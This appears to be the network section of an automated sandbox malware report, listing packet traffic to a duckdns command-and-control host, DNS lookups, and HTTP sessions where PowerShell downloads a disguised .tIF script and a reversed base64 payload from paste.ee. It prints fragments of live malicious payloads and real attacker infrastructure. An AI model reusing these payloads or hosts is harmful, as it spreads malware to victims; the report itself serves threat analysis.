                                                                                                                Dec 16, 2024 07:12:38.992866039 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.992918968 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.993823051 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.993911028 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.993962049 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.995106936 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.995162010 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.995981932 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.996340990 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.996474981 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.997565031 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.997618914 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.997721910 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.998856068 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.998912096 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.998975992 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.999026060 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.000117064 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.000211000 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.000264883 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.001358986 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.001467943 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.001523018 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.002629042 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.002741098 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.003092051 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.003788948 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.127348900 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.127449036 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.127496004 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.127552032 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.127654076 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.127655029 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.128452063 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.128528118 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.128698111 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.129430056 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.129539013 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.129722118 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.130489111 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.130542994 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.130547047 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.131444931 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.131500006 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.131580114 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.132457972 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.132519960 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.132575989 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.133471966 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.133594036 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.133649111 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.134466887 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.134603024 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.134655952 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.135468960 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.135530949 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.135622025 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.136522055 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.136576891 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.136584044 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.137494087 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.137608051 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.137645006 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.138518095 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.138576031 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.138636112 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.139547110 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.139698982 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.139750957 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.140542984 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.140681028 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.140739918 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.141544104 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.141655922 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.141709089 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.142541885 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.142595053 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.142647982 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.143591881 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.143641949 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.143724918 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.144583941 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.144644022 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.144691944 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.145582914 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.145709038 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.145761967 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.146646976 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.146814108 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.146863937 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.147600889 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.147695065 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.147700071 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.148634911 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.148694038 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.148749113 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.149619102 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.149672985 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.149739981 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.150643110 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.150696993 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.150696993 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.151619911 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.152316093 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:40.597604990 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:40.717991114 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:40.718010902 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:40.718024015 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:40.718035936 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:40.718064070 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:40.718075991 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:40.718087912 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:40.718100071 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:40.718116045 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:40.718138933 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:40.718138933 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:40.718189001 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:40.838051081 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:40.838082075 CET1464649740107.173.143.31192.168.2.4
Dec 16, 2024 07:12:40.838109970 CET | 14646 | 49740 | 107.173.143.31 | 192.168.2.4
Dec 16, 2024 07:12:40.838221073 CET | 14646 | 49740 | 107.173.143.31 | 192.168.2.4
Dec 16, 2024 07:12:40.838248968 CET | 14646 | 49740 | 107.173.143.31 | 192.168.2.4
Dec 16, 2024 07:12:40.838280916 CET | 14646 | 49740 | 107.173.143.31 | 192.168.2.4
Dec 16, 2024 07:12:40.838659048 CET | 14646 | 49740 | 107.173.143.31 | 192.168.2.4
Dec 16, 2024 07:12:40.838723898 CET | 49740 | 14646 | 192.168.2.4 | 107.173.143.31
Dec 16, 2024 07:13:07.204369068 CET | 14646 | 49739 | 107.173.143.31 | 192.168.2.4
Dec 16, 2024 07:13:07.205672979 CET | 49739 | 14646 | 192.168.2.4 | 107.173.143.31
Dec 16, 2024 07:13:07.338561058 CET | 14646 | 49739 | 107.173.143.31 | 192.168.2.4
Dec 16, 2024 07:13:37.647975922 CET | 14646 | 49739 | 107.173.143.31 | 192.168.2.4
Dec 16, 2024 07:13:37.649298906 CET | 49739 | 14646 | 192.168.2.4 | 107.173.143.31
Dec 16, 2024 07:13:37.769485950 CET | 14646 | 49739 | 107.173.143.31 | 192.168.2.4
Dec 16, 2024 07:14:08.069878101 CET | 14646 | 49739 | 107.173.143.31 | 192.168.2.4
Dec 16, 2024 07:14:08.071892977 CET | 49739 | 14646 | 192.168.2.4 | 107.173.143.31
Dec 16, 2024 07:14:08.191962004 CET | 14646 | 49739 | 107.173.143.31 | 192.168.2.4
Dec 16, 2024 07:14:26.076879978 CET | 49741 | 80 | 192.168.2.4 | 178.237.33.50
Dec 16, 2024 07:14:26.404227018 CET | 49741 | 80 | 192.168.2.4 | 178.237.33.50
Dec 16, 2024 07:14:27.044168949 CET | 49741 | 80 | 192.168.2.4 | 178.237.33.50
Dec 16, 2024 07:14:28.325437069 CET | 49741 | 80 | 192.168.2.4 | 178.237.33.50
Dec 16, 2024 07:14:30.887974977 CET | 49741 | 80 | 192.168.2.4 | 178.237.33.50
Dec 16, 2024 07:14:35.997327089 CET | 49741 | 80 | 192.168.2.4 | 178.237.33.50
Dec 16, 2024 07:14:38.458136082 CET | 14646 | 49739 | 107.173.143.31 | 192.168.2.4
Dec 16, 2024 07:14:38.459567070 CET | 49739 | 14646 | 192.168.2.4 | 107.173.143.31
Dec 16, 2024 07:14:38.579684973 CET | 14646 | 49739 | 107.173.143.31 | 192.168.2.4
Dec 16, 2024 07:14:46.247361898 CET | 49741 | 80 | 192.168.2.4 | 178.237.33.50
Dec 16, 2024 07:15:08.489736080 CET | 14646 | 49739 | 107.173.143.31 | 192.168.2.4
Dec 16, 2024 07:15:08.491771936 CET | 49739 | 14646 | 192.168.2.4 | 107.173.143.31
Dec 16, 2024 07:15:08.611573935 CET | 14646 | 49739 | 107.173.143.31 | 192.168.2.4
Dec 16, 2024 07:15:39.494973898 CET | 14646 | 49739 | 107.173.143.31 | 192.168.2.4
Dec 16, 2024 07:15:39.498414993 CET | 49739 | 14646 | 192.168.2.4 | 107.173.143.31
Dec 16, 2024 07:15:39.618335962 CET | 14646 | 49739 | 107.173.143.31 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 16, 2024 07:12:08.862148046 CET | 53590 | 53 | 192.168.2.4 | 1.1.1.1
Dec 16, 2024 07:12:30.021754026 CET | 62021 | 53 | 192.168.2.4 | 1.1.1.1
Dec 16, 2024 07:12:30.433468103 CET | 53 | 62021 | 1.1.1.1 | 192.168.2.4
Dec 16, 2024 07:12:33.560504913 CET | 65410 | 53 | 192.168.2.4 | 1.1.1.1
Dec 16, 2024 07:12:33.899667025 CET | 53 | 65410 | 1.1.1.1 | 192.168.2.4
Dec 16, 2024 07:12:36.082838058 CET | 49929 | 53 | 192.168.2.4 | 1.1.1.1
Dec 16, 2024 07:12:36.222424984 CET | 53 | 49929 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 16, 2024 07:12:08.862148046 CET | 192.168.2.4 | 1.1.1.1 | 0x3fc | Standard query (0) | res.cloudinary.com | A (IP address) | IN (0x0001) | false
Dec 16, 2024 07:12:30.021754026 CET | 192.168.2.4 | 1.1.1.1 | 0x21ec | Standard query (0) | paste.ee | A (IP address) | IN (0x0001) | false
Dec 16, 2024 07:12:33.560504913 CET | 192.168.2.4 | 1.1.1.1 | 0xeb06 | Standard query (0) | kelexrmcadmnnccupdated.duckdns.org | A (IP address) | IN (0x0001) | false
Dec 16, 2024 07:12:36.082838058 CET | 192.168.2.4 | 1.1.1.1 | 0x7a18 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 16, 2024 07:12:09.263643026 CET | 1.1.1.1 | 192.168.2.4 | 0x3fc | No error (0) | res.cloudinary.com | ion.cloudinary.com.edgekey.net | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 16, 2024 07:12:30.433468103 CET | 1.1.1.1 | 192.168.2.4 | 0x21ec | No error (0) | paste.ee | - | 172.67.187.200 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 07:12:30.433468103 CET | 1.1.1.1 | 192.168.2.4 | 0x21ec | No error (0) | paste.ee | - | 104.21.84.67 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 07:12:33.899667025 CET | 1.1.1.1 | 192.168.2.4 | 0xeb06 | No error (0) | kelexrmcadmnnccupdated.duckdns.org | - | 107.173.143.31 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 07:12:36.222424984 CET | 1.1.1.1 | 192.168.2.4 | 0x7a18 | No error (0) | geoplugin.net | - | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                                                                                                                • paste.ee
                                                                                                                • 192.3.122.159
                                                                                                                • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 192.3.122.159 | 80 | 7528 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 07:12:02.946059942 CET | 339 | OUT | GET /121/simplegreatfeatureswithnicespeakingthingsentirelifegoingon.tIF HTTP/1.1
                                                                                                                Accept: */*
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                Host: 192.3.122.159
                                                                                                                Connection: Keep-Alive
Dec 16, 2024 07:12:04.055463076 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Mon, 16 Dec 2024 06:12:04 GMT
                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                                                Last-Modified: Sun, 15 Dec 2024 14:46:42 GMT
                                                                                                                ETag: "25af0-6295021e00b94"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 154352
                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: image/tiff
                                                                                                                Data Ascii: NgpHGGopqfzbuIi = "IGsPeULGGRChoKK"NioiWTONaBCGkRl = "qWGkZCKSuAKZHCC"sLkqrPLLWPdOLzA = "WmKeGIKNuWuckaz"loPkHLokKmLsBLW = "iUWKipLIKtuipWN"AiUuKnkdbKRLPLu = "ALANcLAPJztWWuI"LmLheWtcahtGKkt = "RCZbqUxkiaWoPep"kLnRAohxoUmtOlQ = "ikGKIlLUjaBGmRA"WpxUClcHAtLGOLp = "jCPuRocBSWGoWiK"ZZWcGifIOoxsOuG = "tBzbmtipNUALKAi"LrdWULlbPiotxiU = "LWIAxLLimcaLPAt"pkZqlPppLtinihk = "pLktbCULLPLdpGA"lZcLcqcOzmippUA = "GxGHWCTzxZkztic"PkKcCR


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49741 | 178.237.33.50 | 80 | 6772 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 07:12:36.346940041 CET | 71 | OUT | GET /json.gp HTTP/1.1
                                                                                                                Host: geoplugin.net
                                                                                                                Cache-Control: no-cache
Dec 16, 2024 07:12:37.593066931 CET | 1171 | IN | HTTP/1.1 200 OK
                                                                                                                date: Mon, 16 Dec 2024 06:12:37 GMT
                                                                                                                server: Apache
                                                                                                                content-length: 963
                                                                                                                content-type: application/json; charset=utf-8
                                                                                                                cache-control: public, max-age=300
                                                                                                                access-control-allow-origin: *
                                                                                                                Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7503", "geoplugin_longitude":"-74.0014", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49738 | 172.67.187.200 | 443 | 7776 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 06:12:31 UTC | 67 | OUT | GET /r/pBbD1/0 HTTP/1.1
                                                                                                                Host: paste.ee
                                                                                                                Connection: Keep-Alive
2024-12-16 06:12:32 UTC | 1288 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Mon, 16 Dec 2024 06:12:31 GMT
                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Cache-Control: max-age=2592000
                                                                                                                strict-transport-security: max-age=63072000
                                                                                                                x-frame-options: DENY
                                                                                                                x-content-type-options: nosniff
                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                                                                                CF-Cache-Status: HIT
                                                                                                                Age: 19497
                                                                                                                Last-Modified: Mon, 16 Dec 2024 00:47:34 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E2IMQoxEVd0JuRGt8MNT07NA0uYFyV%2BN%2BU6WU%2Bck13nILH1CT8G82txbjQKqM0le6TW1Y1bzCpzdTDmn1%2By2YoROuTUbmx7uauSdwlavfRtRPARQUkEOh0V25w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f2c85b38b094257-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
2024-12-16 06:12:32 UTC | 215 | IN
                                                                                                                Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1746&min_rtt=1737&rtt_var=658&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2816&recv_bytes=681&delivery_rate=1681059&cwnd=215&unsent_bytes=0&cid=43e3d6e81a1960a6&ts=455&x=0"
                                                                                                                Data Ascii: 6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj5QYO8lDd5wWOklDX5QVOMlDR5wTO0kDL5QSOckDF5wQOEgD/4QPOsjD54wNOUjDz4QMO8iDt4QEOAhDP4gDO0gDM4wCOogDJ4ACOcgDG4QBOQgDA3w/N4fD93A/NsfD63Q+NgfD33g9NUfDw3w7N4eDt3A7NseDq3Q6NgeDn3g5NUeDk3w4NIeD
                                                                                                                2024-12-16 06:12:32 UTC1369INData Raw: 41 77 50 68 2f 54 49 2b 41 74 50 47 36 7a 4f 2b 49 54 50 47 33 54 76 39 41 55 50 33 77 44 74 38 6f 32 4f 7a 74 7a 41 36 34 63 4f 65 6e 7a 79 35 4d 55 4f 4e 67 54 4f 31 38 45 4e 31 54 44 68 7a 30 35 4d 38 4e 44 42 79 4d 75 4d 4e 4c 44 6c 79 34 53 4d 2f 48 54 31 78 77 47 4d 55 43 7a 52 41 41 41 41 51 42 51 42 41 41 77 50 4e 2f 7a 75 2f 49 6a 50 73 33 7a 34 36 59 69 4f 65 6f 6a 46 36 34 67 4f 48 67 6a 51 34 59 77 4e 30 66 6a 34 33 41 39 4e 2b 65 54 43 30 41 79 4d 68 50 7a 7a 7a 30 37 4d 72 4f 54 6d 7a 63 34 4d 31 4e 7a 59 7a 45 31 4d 2f 4d 54 4c 7a 73 78 4d 4a 49 54 78 79 45 72 4d 68 4a 6a 57 79 38 68 4d 4a 45 7a 31 78 73 63 4d 63 47 7a 6a 78 45 56 4d 77 45 6a 4a 78 4d 42 4d 70 44 44 34 77 6b 4e 4d 58 43 44 6b 77 59 46 4d 41 42 54 4b 77 49 43 41 41 41 41 64
                                                                                                                Data Ascii: AwPh/TI+AtPG6zO+ITPG3Tv9AUP3wDt8o2OztzA64cOenzy5MUONgTO18EN1TDhz05M8NDByMuMNLDly4SM/HT1xwGMUCzRAAAAQBQBAAwPN/zu/IjPs3z46YiOeojF64gOHgjQ4YwN0fj43A9N+eTC0AyMhPzzz07MrOTmzc4M1NzYzE1M/MTLzsxMJITxyErMhJjWy8hMJEz1xscMcGzjxEVMwEjJxMBMpDD4wkNMXCDkwYFMABTKwICAAAAd
                                                                                                                2024-12-16 06:12:32 UTC1369INData Raw: 31 4d 2b 4d 44 48 79 34 71 4d 4d 4b 44 66 79 63 6d 4d 64 46 44 76 78 63 61 4d 65 47 54 6b 78 59 59 4d 77 45 44 4b 78 4d 41 4d 37 44 54 7a 77 59 4d 4d 31 43 7a 71 77 45 4b 4d 61 43 7a 69 77 55 49 4d 2b 42 7a 63 41 41 41 41 30 42 41 42 41 43 67 50 33 37 44 37 2b 77 6f 50 30 34 6a 4c 2b 67 69 50 56 34 7a 42 39 38 66 50 6f 33 6a 33 39 4d 64 50 4e 33 44 79 39 4d 61 50 61 32 6a 64 39 34 57 50 76 30 7a 4a 38 59 4f 50 62 7a 44 69 38 49 49 50 62 77 7a 45 38 55 77 4f 39 76 44 39 37 73 2b 4f 6a 76 7a 32 37 4d 39 4f 49 76 6a 74 37 34 36 4f 69 75 6a 6d 37 45 35 4f 49 75 44 67 37 67 33 4f 77 74 44 61 37 73 31 4f 50 74 7a 52 37 6b 67 4f 64 72 54 73 36 6f 6f 4f 45 71 6a 66 36 67 6e 4f 77 70 44 62 36 45 6d 4f 53 70 6a 52 36 55 6a 4f 70 6f 7a 46 35 4d 66 4f 6b 6e 6a 31 35
                                                                                                                Data Ascii: 1M+MDHy4qMMKDfycmMdFDvxcaMeGTkxYYMwEDKxMAM7DTzwYMM1CzqwEKMaCziwUIM+BzcAAAA0BABACgP37D7+woP04jL+giPV4zB98fPo3j39MdPN3Dy9MaPa2jd94WPv0zJ8YOPbzDi8IIPbwzE8UwO9vD97s+Ojvz27M9OIvjt746Oiujm7E5OIuDg7g3OwtDa7s1OPtzR7kgOdrTs6ooOEqjf6gnOwpDb6EmOSpjR6UjOpozF5MfOknj15
                                                                                                                2024-12-16 06:12:32 UTC1369INData Raw: 4d 34 50 6a 34 79 34 71 4d 39 4a 6a 63 79 63 6c 4d 7a 49 7a 46 79 55 41 4d 66 44 54 77 77 4d 4b 4d 65 42 41 41 41 41 4c 41 45 41 43 41 41 41 77 50 30 39 7a 5a 2f 63 31 50 4b 35 6a 6b 2b 49 6c 50 41 35 7a 4d 2b 67 69 50 45 30 44 31 39 63 63 50 74 32 6a 51 39 49 77 4f 66 74 6a 53 35 30 45 4f 73 6a 6a 59 34 67 42 4f 44 63 54 71 33 59 6c 4e 4a 56 7a 61 31 67 55 4e 59 51 7a 42 41 41 41 41 45 42 41 42 51 41 41 41 41 67 7a 38 31 55 61 4e 49 57 6a 4e 30 41 39 4d 34 4b 7a 2b 79 49 73 4d 63 4b 44 59 78 4d 49 4d 52 43 44 59 41 41 41 41 6b 41 41 42 41 41 77 50 43 2f 54 66 2f 6f 6b 50 34 37 7a 79 2b 34 5a 50 73 33 7a 4e 39 63 77 4f 32 75 7a 62 37 51 78 4f 47 67 6a 7a 34 49 67 4e 74 4e 54 32 7a 6b 30 4d 6a 4d 6a 42 79 51 52 4d 75 41 41 41 41 51 44 41 44 41 50 41 2b 4d
                                                                                                                Data Ascii: M4Pj4y4qM9JjcyclMzIzFyUAMfDTwwMKMeBAAAALAEACAAAwP09zZ/c1PK5jk+IlPA5zM+giPE0D19ccPt2jQ9IwOftjS50EOsjjY4gBODcTq3YlNJVza1gUNYQzBAAAAEBABQAAAAgz81UaNIWjN0A9M4Kz+yIsMcKDYxMIMRCDYAAAAkAABAAwPC/Tf/okP47zy+4ZPs3zN9cwO2uzb7QxOGgjz4IgNtNT2zk0MjMjByQRMuAAAAQDADAPA+M
